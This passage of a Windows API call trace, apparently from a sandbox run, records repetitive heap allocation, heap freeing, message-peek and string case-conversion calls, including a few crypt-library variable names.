| out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0129.877] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0129.877] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0129.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0129.877] PeekMessageW (in: lpMsg=0x144e6ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6ec) returned 0 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0129.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0129.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0129.878] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0129.878] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.878] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0129.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0129.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0129.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0129.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0129.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0129.878] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0129.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.879] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0129.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.879] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0129.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0129.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0129.880] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0129.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392148 | out: hHeap=0x1780000) returned 1 [0129.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.880] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0129.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0129.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0129.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0129.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.881] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0129.881] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0129.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0129.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0129.881] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0129.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0129.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.881] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0129.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0129.882] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392458 [0129.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392458 | out: hHeap=0x1780000) returned 1 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.882] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0129.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0129.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0129.883] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.883] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0129.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0129.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0129.884] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.884] HeapFree (in: hHeap=0x1780000, 